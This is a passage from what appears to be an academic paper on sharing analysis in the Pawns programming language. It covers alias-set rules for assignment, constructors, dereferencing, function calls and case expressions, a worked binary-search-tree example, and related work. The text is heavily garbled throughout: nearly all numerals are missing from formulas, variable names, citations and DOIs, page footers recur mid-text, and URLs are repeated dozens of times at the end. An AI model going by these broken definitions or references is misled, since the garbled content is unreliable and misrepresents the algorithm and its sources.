{va.ca | {v .[ref. ],va.ca} ∈ a } -- (live variables in al, which includes v , must be -- annotated with ! and must not share with abstract) self al = {{fc(va.(ca++c )), fc(vb.(cb++c ))}| va.ca ∈ al ∧ vb.cb ∈ al ∧ {v .c ,v .c } ∈ a } share al = {{fc(va.(ca++c )),v.c } | va.ca ∈ al ∧ {v .c ,v.c } ∈ a } in if v is a mutable parameter then a ∪ self al ∪ share al else let -- old = old aliases for v , which can be removed old = {{v .(ref. :d:c ),v.c } | {v .(ref. :d:c ),v.c } ∈ a } in (a \ old ) ∪ self al ∪ share al assignment to an existing variable differs from binding a fresh variable in three ways. first, self-sharing for v .[ref. ] is not added since it already exists. second, v .[ref. ] may alias several variable components (the live subset of these variables must be annotated with “!” on the assignment statement; checking such annotations is a primary purpose of the analysis). all these variables end up sharing with v and what v shares with (via share al) plus themselves and each other (via self al). the components must be concatenated and folded appropriately. third, if v is not a mutable parameter the existing sharing with a path strictly longer than [ref. ] (that is, paths of the form ref. :d : c ) can safely be removed, improving precision. the component v .[ref. ] represents the single memory word that is overwritten and whatever the old contents shared with is no longer needed to describe the sharing for v . for mutable parameters the old value may share with variables from the calling context and we retain this information, as explained naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. later. consider the example below, where t and ts are as before and local variables v and v are references to the element of ts. the value assigned, v , is rnode (cons (rnode nil) nil). there is aliasing of v .[ref. ], v .[ref. ] and ts.[cons. ] so all these variables have the sharing of v and self-sharing added. generally we must also add sharing between all pairs of these variables. for example, {ts.[cons. ], v .[ref. ,rnode. ,cons. ]} must be added because the cons component of v did not previously exist. the old sharing of v with t is discarded. note that we cannot discard the old sharing of ts and v with t for two reasons. first, no definite aliasing information is maintained, so we cannot be sure v or ts are modified at all. second, the assignment updates only one memory word whereas there may be other words also represented by ts.[cons. ]. in some cases, the old sharing of v is discarded and immediately added again. consider the following example, which creates a cyclic list. the sharing between v and v is discarded but added again (via share al) because v also shares with v . correctness of the algorithm when cyclic terms are created depends on the abstract domain we use. a more expressive domain could distinguish between different cons cells in a list. for example, if types are “folded” at the third level of recursion rather than the first, the domain can distinguish three classes of cons cells, where the distance from the first cons cell, modulo three, is zero, one or two. for a cyclic list with a single cons cell, that cons cell must be in all three classes and our algorithm would need modification to achieve this. however, in our domain types are folded at the first level of recursion so we have a unique folded path for each memory cell in cyclic data structure (cyclic terms can only be created with recursive types). there is no distinction between the first and second cons cell in a list, for example. naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. alias (dc v dc [v ,... vn]) a = -- v = dc v ...vn let self = {{fc(v.[dc.i]), fc(v.[dc.i])} | ≤ i ≤ n} ∪ {{fc(v.(dc.i:c )),fc(v.(dc.j:c ))} | {vi.c ,vj.c } ∈ a } share = {{fc(v.(dc.i:c )),w.c } | {vi.c ,w.c } ∈ a } in a ∪ self ∪ share the derefeq case can be seen as equivalent to v = ref v and binding a variable to a data constructor with n variable arguments is a generalisation. if there are multiple vi that share, the corresponding components of v must also share; these pairs are included in self . alias (eqderef v v ) a = -- v = *v let self = {{v .c ,v .c } | {fc(v .(ref. :c )),fc(v .(ref. :c ))} ∈ a } share = {{v .c ,v.c } | {fc(v .(ref. :c )),v.c } ∈ a empty = {{v .[],v.c} | {v .[],v.c} ∈ (self ∪ share ) in if the type of v has a [] component then a ∪ self ∪ share else --- avoid bogus sharing with empty component (a ∪ self ∪ share )\ empty the eqderef case is similar to the inverse of derefeq in that we are removing ref. rather than prepending it (the definition implicitly uses the inverse of fc). however, if the empty component results we must check that such a component exists for the type of v . alias (app v f [v ,... vn]) a = -- v = f v ...vn let "f(w , ... wk+ n) = r" is used to declare sharing for f mut = the arguments that are declared mutable post = the postcondition of f along with the sharing for mutable arguments from the precondition, with parameters and result renamed with f.[cl.k],... f.[cl. ],v ,... vn and v, respectively -- (the renamed precondition of f must be a subset of a , -- and mutable arguments of f and live variables they share -- with must be annotated with ! and must not share with -- abstract) -- selfc+sharec needed for possible closure creation selfc = {{v.[cl.i],v.[cl.i] | ≤ i ≤ n} ∪ {{v.((cl.(n + − i)):c ),v.((cl.(n+ -j)):c )} | {vi.c ,vj.c } ∈ a } ∪ {{v.((cl.(i + n)):c ),v.((cl.(j + n)):c )} | {f.((cl.i):c ),f.((cl.j):c )} ∈ a } sharec = {{v.((cl.(n + − i)):c ),x.c } | {vi.c ,x.c )} ∈ a } ∪ {{v.((cl.(i + n)):c ),x.c | {f.((cl.i):c ),x.c } ∈ a } -- postt+postm needed for possible function call postt = {{x .c ,x .c } | {x .c ,x .c } ∈ post ∧{x .c ,x .c } ∈ a } naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. postm = {{x .c ,x .c } | {x .c ,vi.c } ∈ a } ∧ {x .c ,vj.c } ∈ a ∧ {vi.c ,vj.c } ∈ post ∧vi ∈ mut ∧ vj ∈ mut} in a ∪ selfc ∪ sharec ∪ postt ∪ postm for many app occurrences, the function is known statically and we can determine if the function is actually called or a closure is created instead. however, in general we must assume either could happen and add sharing for both. if a closure is created, the first n closure arguments share with the n arguments of the function call and any closure arguments of f share with additional closure arguments of the result (this requires renumbering of these arguments). analysis of function calls relies on the sharing and mutability information attached to all arrow types. because pawns uses the syntax of statements to express pre- and post-conditions, our implementation uses the sharing analysis algorithm to derive an explicit alias set representation (currently this is done recursively, with the level of recursion limited by the fact than pre- and post-conditions must not contain function calls). here we ignore the details of how the alias set representation is obtained. the compiler also uses the sharing information immediately before an application to check that the precondition is satisfied, all required “!” annotations are present and abstract variables are not modified. given that the precondition is satisfied, the execution of a function results in sharing of parameters that is a subset of the union of the declared pre- and post-conditions (we assume the induction hypothesis holds for the sub-computation, which has a smaller depth of recursion). however, any sharing between non-mutable arguments that exists immediately after the call must exist before the call. the analysis algorithm does not add sharing between non-mutable arguments in the precondition as doing so would unnecessarily restrict how “high level” and “low level” code can be mixed. it is important we can pass a variable to a function that allows an abstract argument without the analysis concluding the variable subsequently shares with abstract, and therefore cannot be updated. thus post is just the declared postcondition plus the subset of the precondition which involves mutable parameters of the function, renamed appropriately. the last n formal parameters, wk+ ...wk+n are renamed as the arguments of the call, v ...vn and the formal result r is renamed v. the formal parameters w ...wk represent closure arguments k ... of f. thus a variable component such as w .[cons. ] is renamed f.[cl.k,cons. ]. it is also necessary to include one step of transitivity in the sharing information: if variable components x .c and x .c alias in post and x .c and x .c (may) alias before the function call, we add an alias of x .c and x .c (in postt). function parameters are proxies for the argument variables as well as any variable components they may alias and when functions are analysed these aliases are not known. this is why the transitivity step is needed, and why mutable parameters also require special treatment. if before the call, x .c and x .c may alias with mutable parameter components vi.c and vj.c , respectively, and the two mutable parameter components alias in post then x .c and x .c may alias naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. after the call; this is added in postm. consider the example below, where we have a pair v (of references to references to integers) and variables x and y share with the two elements of v , respectively. when v is passed to function f as a mutable parameter, sharing between x and y is introduced. the sharing of the mutable parameter in the postcondition, {v .[pair. ,ref. ,ref. ],v .[pair. ,ref. ,ref. ]}, results in sharing between x and y being added in the analysis. f :: pair (ref (ref int)) -> () sharing f !v = _ pre nosharing post *a = *b; v = pair a b f !v = case v of (pair rr rr ) -> *rr := *rr !v the need to be conservative with the sharing of mutable parameters in the analysis of function definitions (the special treatment in assign) is illustrated by the example below. consider the initial state, with variables v and v which share with x and y, respectively. after f is called x and y share, even though the parameters v and v do not share at any point in the execution of f . if mutable parameters were not treated specially in the assign case, nosharing would be accepted as the postcondition of f and the analysis of the call to f would then be incorrect. the sharing is introduced between memory cells that were once shared with v and others that were once shared with v . thus in our algorithm, the sharing of mutable parameters reflects all memory cells that are reachable from the parameters during the execution of the function. where the mutable parameters are assigned in f , the sharing of the parameters’ previous values (rr and rr ) is retained. thus when the final assignment is processed, sharing between the parameters is added and this must be included in the postcondition. although this assignment does not modify v or v , the “!” annotations are necessary and alert the reader to potential modification of variables that shared with the parameters when the function was called. naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. f :: ref (ref (ref int)) -> ref (ref (ref int)) -> () sharing f !v !v = _ pre nosharing post **v = **v f !v !v = *r = -- ref to new cell containing *rr = r -- ref to above ref *r = -- ref to new cell containing *rr = r -- ref to above ref rr = *v -- save *v rr = *v -- save *v *!v := rr -- update *v with ref (ref ) *!v := rr -- update *v with ref (ref ) *rr := *rr !v !v -- can create sharing at call alias error a = ∅ -- error alias (case v [(p ,s ),...(pn,sn)]) a = -- case v of ... let old = {{v.c ,v .c | {v.c ,v .c } ∈ a } in  ≤ i≤ n aliascase a old v pi si aliascase a av v (pat dc [v ,... vn]) s = -- (dc *v ...*vn) -> s let avdc = {{fc(v.(dc.i:c )),w.c } | {fc(v.(dc.i:c )),w.c } ∈ av} rself = {{vi.[ref. ],vi.[ref. ]} | ≤ i ≤ n} vishare = {{fc(vi.(ref. :c )),fc(vj.(ref. :c ))} | {fc(v.(dc.i:c )),fc(v.(dc.j:c ))} ∈ av} share = {{fc(vi.(ref. :c )),w.c } | {fc(v.(dc.i:c )),w.c ))} ∈ av} in alias s (rself ∪ vishare ∪ share∪(a \ av)∪ avdc) for a case expression we return the union of the alias sets obtained for each of the different branches. for each branch, we only keep sharing information for the variable we are switching on that is compatible with the data constructor in that branch (we remove all the old sharing, av, and add the compatible sharing, avdc). we implicitly use the inverse of fc. to deal with individual data constructors, we consider pairs of components of arguments i and j which may alias in order to compute possible sharing between vi and vj, including self-aliases when i = j. the corresponding component of vi (prepended with ref and folded) may alias the component of vj. for example, if v of type rtrees is matched with cons *v *v and v.[] self-aliases, we need to find the components which fold to v.[] (v.[cons. ] and v.[cons. ,rnode. ]) in order to compute the sharing for v and v . thus we compute that v .[ref. ], may alias v .[ref. ,rnode. ]. this can occur if the data structure is cyclic, such as the example below where v is a list containing a single tree with in the node and v as the children (hence it represents a single infinite branch). note that v .[ref. ,rnode. ] represents both the memory cell containing the cons pointer and the cell containing nil. naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. alias (instype v v ) a = -- v = v ::t alias (eqvar v v ) a -- (if any sharing is introduced between v and v , -- v must not be indirectly updated later while live) type instantiation is dealt with in the same way as variable equality, with the additional check that if any sharing is introduced, the variable with the more general type is not implicitly updated later while still live (it is sufficient to check there is no “!v ” annotation attached to a later statement). example we now show how this sharing analysis algorithm is applied to the binary search tree code given earlier. we give a core pawns version of each function and the alias set before and after each statement, plus an additional set at the end which is the union of the pre- and post-conditions of the function. to save space, we write the alias set as a set of sets where each inner set represents all sets containing exactly two of its members. thus {{a,b,c}} represents a set of six alias pairs: aliasing between all pairs of elements, including self-aliases. the return value is given by variable ret and variables absl and abst are the versions of abstract for type ints and tree, respectively. list_bst xs = -- v = tnil -- *tp = v -- list_bst_du xs !tp -- ret = *tp -- we start with the precondition: a = {{xs.[cons. ], absl.[cons. ]}, {xs.[], absl.[]}}. binding to a constant introduces no sharing so a = a . a = a ∪{tp.[ref. ]}. the function call has precondition a ∪ {{tp.[ref. ]},{tp.[ref. ,node. ]}}, which is a superset of a . since tp is a mutable argument the precondition sharing for tp is added: a = a ∪ {{tp.[ref. ,node. ]}}. the final sharing includes the return variable, ret: a = a ∪ {{ret.[],tp.[ref. ]}, {ret.[node. ],tp.[ref. ,node. ]}}. after removing sharing for the dead (local) variable tp we obtain a subset of the union of the pre- and post-conditions, which is a ∪ {{ret.[],abst.[]},{ret.[node. ], abst.[node. ]}}. list_bst_du xs !tp = -- case xs of (cons *v *v ) -> -- naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. x = *v -- xs = *v -- v = bst_insert_du x !tp -- v = list_bst_du xs !tp -- ret = v -- nil -> -- ret = () -- -- after case -- we start with the precondition, a = {{tp.[ref. ]}, {tp.[ref. ,node. ]}, {xs.[cons. ],absl.[cons. ]},{xs.[],absl.[]}}. the cons branch of the case introduces sharing for v and v : a = a ∪{{xs.[cons. ], absl.[cons. ], v .[ref. ], v .[ref. ,cons. ]},{v .[ref. ],xs.[], absl.[]}}. the list elements are atomic so a = a . the next binding makes the sharing of xs and xs the same: a = a ∪{{v .[ref. ],xs.[], xs .[], absl.[]}, {v .[ref. ],xs.[cons. ], xs .[cons. ], absl.[cons. ], v .[ref. ,cons. ]}}. this can be simplified by removing the dead variables v and v . the precondition of the calls are satisfied and a = a = a = a . for the nil branch, we remove the incompatible sharing for xs from a : a = {{tp.[ref. ]}, {tp.[ref. ,node. ]}, {absl.[cons. ]}, {absl.[]}} and a = a . finally, a = a ∪ a . this contains all the sharing for mutable parameter tp and, ignoring local variables, is a subset of the union of the pre- and post-conditions, a . bst_insert_du x !tp = -- v = *tp -- case v of tnil -> -- v = tnil -- v = tnil -- v = node v x v -- *!tp := v -- ret = () -- (node *lp *v *rp) -> -- n = *v -- v = (x <= n) -- case v of true -> -- v = (bst_insert_du x !lp) !tp -- ret = v -- false -> -- v = (bst_insert_du x !rp) !tp -- ret = v -- -- end case -- -- end case -- naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. here a = {{tp.[ref. ]}, {tp.[ref. ,node. ]}} and a = a ∪ {{v .[], tp.[ref. ]}, {tp.[ref. ,node. ], v .[node. ]}}. for the tnil branch we remove the v sharing so a = a = a = a and a = a ∪ {{v .[]}, {v .[node. ]}}. after the destructive update, a = a ∪ {{v .[], tp.[ref. ]}, {v .[node. ], tp.[ref. ,node. ]}} (v is dead and can be removed) and a = a . for the node branch we have a = a ∪ {{v .[], tp.[ref. ], lp.[ref. ], rp.[ref. ]}, {tp.[ref. ,node. ], lp.[ref. ,node. ], rp.[ref. ,node. ], v .[ref. ], v .[node. ]}}. the same set is retained for a ...a (assuming the dead variable v is retained), the preconditions of the function calls are satisfied and the required annotations are present. finally, a = a ∪ a , which contains all the sharing for tp, and after eliminating local variables we get the postcondition, which is the same as the precondition. discussion imprecision in the analysis of mutable parameters could potentially be reduced by allowing the user to declare that only certain parts of a data structure are mutable, as suggested in naish ( ). it is inevitable we lose some precision with recursion in types, but it seems that some loss of precision could be avoided relatively easily. the use of the empty path to represent sub-components of recursive types results in imprecision when references are created. for example, the analysis of *vp = nil; v = *vp concludes that the empty component of v may alias with itself and the ref component of vp (in reality, v has no sharing). instead of the empty path, a dummy path of length one could be used. flagging data structures which are known to be acyclic could also improve precision for case. a more aggressive approach would be to unfold the recursion an extra level, at least for some types. this could allow us to express (non-)sharing of separate subtrees and whether data structures are cyclic, at the cost of more variable components, more complex pre- and post-conditions and more complex analysis for assign and case. increasing the number of variable components also decreases efficiency. the algorith- mic complexity is affected by the representation of alias sets. currently we use a naive implementation, using just ordered pairs of variable components as the set elements and a set library which uses an ordered binary tree. the size of the set can be o(n ), where n is the maximum number of live variable components of the same type at any program point (each such variable component can alias with all the others). in typical code, the number of live variables at any point is not particularly large. if the size of alias sets does become problematic, a more refined set representation could be used, such as the set of sets of pairs representation we used in ‘example,’ where sets of components that all alias with each other are optimised. there are also simpler opportunities for efficiency gains, such as avoiding sharing analysis for entirely pure code. we have not stress tested our implementation or run substantial benchmarks as it is intended to be a prototype, but performance has been encouraging. translating the tree insertion code plus a test harness to c, which includes the sharing analysis, takes less time than compiling the resulting c code using gcc. total compilation time is less than half that of ghc for equivalent haskell code and less than one naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. tenth that of mlton for equivalent ml code. the pawns executable is around – times as fast as the others. related work related programming languages are discussed in naish ( ); here we restrict attention to work related to the sharing analysis algorithm. the most closely related work is that done in the compiler for mars giuca ( ), which extends similar work done for mercury (mazur et al., ) and earlier for prolog mulkers ( ). all use a similar abstract domain based on the type folding method first proposed in bruynooghe ( ). our abstract domain is somewhat more precise due to inclusion of self-aliasing, and we have no sharing for constants. in mars it is assumed that constants other than numbers can share. thus, for code such as xs = []; ys = xs our analysis concludes there is no sharing between xs and ys whereas the mars analysis concludes there may be sharing. one important distinction is that in pawns sharing (and mutability) is declared in type signatures of functions so the pawns compiler just has to check the declarations are consistent, rather than infer all sharing from the code. however, it does have the added complication of destructive update. as well as having to deal with the assignment primitive, it complicates handling of function calls and case statements (the latter due to the potential for cyclic structures). mars, mercury and prolog are essentially declarative languages. although mars has assignment statements the semantics is that values are copied rather than destructively updated—the variable being assigned is modified but other variables remain unchanged. sharing analysis is used in these languages to make the implementation more efficient. for example, the mars compiler can often emit code to destructively update rather than copy a data structure because sharing analysis reveals no other live variables share it. in mercury and prolog, the analysis can reveal when heap-allocated data is no longer used, so the code can reuse or reclaim it directly instead of invoking a garbage collector. these sharing inference systems use an explicit graph representation of the sharing behaviour of each segment of code. for example, code s may cause aliasing between (a component of ) variables a and b (which is represented as an edge between nodes a and b) and between c and d and code s may cause aliasing between b and c and between d and e. to compute the sharing for the sequence s ;s they use the “alternating closure” of the sharing for s and s , which constructs paths with edges alternating from s and s , for example a-b (from s ), b-c (from s ), c-d (from s ) and d-e (from s ). the sharing behaviour of functions in pawns is represented explicitly, by a pre- and post-condition and set of mutable arguments but there is no explicit representation for sharing of statements. the (curried) function alias s represents the sharing behaviour of s and the sharing behaviour of a sequence of statements is represented by the composition of functions. this representation has the advantage that the function can easily use information about the current sharing, including self-aliases, and remove some if appropriate. for example, in the [] branch of the case in the code below the sharing for xs is removed and we can conclude the returned value does not share with the argument. naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. map_const_ :: [t] -> [int] sharing map_const_ xs = ys pre nosharing post nosharing map_const_ xs = case xs of [] -> xs -- can look like result shares with xs (_:xs ) -> :(map_const_ xs ) there is also substantial work on sharing analysis for logic programming languages using other abstract domains, notably the set-sharing domain of jacobs & langen ( ) (a set of sets of variables), generally with various enhancements—see bagnara, zaffanella & hill ( ) for a good summary and evaluation. applications include avoiding the “occurs check” in unification (søndergaard, ) and exploiting parallelism of independent sub-computations (bueno, garćıa de la banda & hermenegildo, ). these approaches are aimed at identifying sharing of logic variables rather than sharing of data structures. for example, although the two prolog goals p(x) and q(x) share x, they are considered independent if x is instantiated to a data structure that is ground (contains no logic variables). ground data structures in prolog are read-only and cause no problem for parallelism or the occurs check, whether they are shared or not. the set-sharing domain is often augmented with extra information related to freeness (free means uninstantiated), linearity (linear means there are no repeated occurrences of any variable) and/or groundness (bagnara, zaffanella & hill, ). in pawns there are no logic variables but data structures are mutable, hence their sharing is important. however, the set-sharing domain (with enhancements) has been adapted to analysis of sharing of data structures in object oriented languages such as java (méndez-lojo & hermenegildo, ). one important distinction is that pawns directly supports algebraic data types which allow a “sum of products”: there can be a choice of several data constructors (a sum), where each one consists of several values as arguments (a product). in java and most other imperative and object oriented languages, additional coding is generally required to support such data types. products are supported by objects containing several values but the only choice (sum) supported directly is whether the object is null or not. java objects and pointers in most imperative languages are similar to a maybe algebraic data type, with nothing corresponding to null. a ref cannot be null. the abstract domain of méndez-lojo & hermenegildo ( ) uses set-sharing plus additional information about what objects are definitely not null. for pawns code that uses refs this information is given by the data type—the more expressive types allow us to trivially infer some information that is obscured in other languages. for code that uses maybe, our domain can express the fact that a variable is definitely nothing by not having a self-alias of the just component. the rich structural information in our domain fits particularly well with algebraic data types. there are also other approaches to and uses of alias analysis for imperative languages, such as landi & ryder ( ) and emami, ghiya & hendren ( ), but these are not aimed at precisely capturing information about dynamically allocated data. a more detailed discussion of such approaches is given in giuca ( ). naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. conclusion purely declarative languages have the advantage of avoiding side effects, such as destructive update of function arguments. this makes it easier to combine program components, but some algorithms are hard to code efficiently without flexible use of destructive update. a function can behave in a purely declarative way if destructive update is allowed, but restricted to data structures that are created inside the function. the pawns language uses this idea to support flexible destructive update encapsulated in a declarative interface. it is designed to make all side effects “obvious” from the source code. because there can be sharing between the representations of different arguments of a function, local variables and the value returned, sharing analysis is an essential component of the compiler. it is also used to ensure “preservation” of types in computations. sharing analysis has been used in other languages to improve efficiency and to give some feedback to programmers but we use it to support important features of the programming language. the algorithm operates on (heap allocated) algebraic data types, including arrays and closures. in common with other sharing analysis used in declarative languages it supports binding of variables, construction and deconstruction (combined with selection or “case”) and function/procedure calls. in addition, it supports explicit pointers, destructive update via pointers, creation and application of closures and pre- and post-conditions concerning sharing attached to type signatures of functions. it also uses an abstract domain with additional features to improve precision. early indications are that the performance is acceptable: compared with other compilers for declarative languages, the prototype pawns compiler supports encapsulated destructive update, is fast and produces fast executables. acknowledgements feedback from reviewers, particularly gianluca amato, was very helpful in ironing out some important bugs in the algorithm and improving the presentation of this paper. additional information and declarations funding the author declares there was no funding for this work. competing interests the author declares there are no competing interests. author contributions • lee naish conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding the availability of data: http://people.eng.unimelb.edu.au/lee/src/pawns/. naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://people.eng.unimelb.edu.au/lee/src/pawns/ http://dx.doi.org/ . /peerj-cs. references bagnara r, zaffanella e, hill p m. . enhanced sharing analysis techniques: a comprehensive evaluation. in: theory and practice of logic programming. vol. . – . available at http://journals. cambridge.org/article s . bruynooghe m. . compile time garbage collection or how to transform programs in an assignment free languages into code with assignments. in: ifip tc /wg . working conference on program specification and transformation, bad-tölz, germany, . available at https://lirias. kuleuven.be/handle/ / . bueno f, garcı́a de la banda m, hermenegildo m. . effectivness of abstract interpretation in automatic parallelization: a case study in logic programming. acm transactions on programming languages and systems ( ): – doi . / . . emami m, ghiya r, hendren lj. . context-sensitive interprocedural points-to analysis in the presence of function pointers. in: proceedings of the acm sigplan conference on programming language design and implementation, pldi’ . new york: acm, – . doi . / . . giuca m. . mars: an imperative/declarative higher-order programming language with automatic destructive update. phd dissertation, university of melbourne. jacobs d, langen a. . accurate and efficient approximation of variable aliasing in logic programs. in: lusk el, overbeek ra, eds. mit press. – . available at http://dblp.uni-trier. de/db/conf/slp/slp .html#jacobsl . jones sp, hughes j, augustsson l, barton d, boutel b, burton w, fasel j, hammond k, hinze r, hudak p et al. . report on the programming language haskell , a non-strict purely functional language, february . available at http://www.haskell.org/definition/. landi w, ryder bg. . a safe approximate algorithm for interprocedural aliasing. acm sigplan notices ( ): – . doi . / . . lippmeier b. . type inference and optimisation for an impure world. phd diss., australian national university. available at http://cs.anu.edu.au/∼ben.lippmeier/project/thesis/ thesis-lippmeier-sub.pdf. mazur n, ross p, janssens g, bruynooghe m. . practical aspects for a working compile time garbage collection system for mercury. in: codognet p, ed. proceedings of iclp , lecture notes in computer science, vol. . springer, – . available at https://lirias.kuleuven.be/ handle/ / . méndez-lojo m, hermenegildo m. . precise set sharing analysis for java-style programs. in: logozzo f, peled d, zuck l, eds. verification, model checking, and abstract interpretation, lecture notes in computer science, vol. . berlin heidelberg: springer, – . available at http://dx.doi.org/ . / - - - - . milner r, tofte m, macqueen d. . the definition of standard ml. cambridge: mit press. mulkers a. . live data structures in logic programs, derivation by means of abstract interpretation. springer-verlag. available at https://lirias.kuleuven.be/handle/ / . naish l. . an informal introduction to pawns: a declarative/imperative language. available at http://people.eng.unimelb.edu.au/lee/papers/pawns (accessed march ). søndergaard h. . an application of abstract interpretation of logic programs: occur check reduction. in: proceedings of the european symposium on programming on esop . new york: springer-verlag new york, inc., – . available at http://dl.acm.org/citation.cfm?id= . . wright a. . simple imperative polymorphism. lisp and symbolic computation ( ): – doi . /bf . naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s http://journals.cambridge.org/article_s https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / https://lirias.kuleuven.be/handle/ / 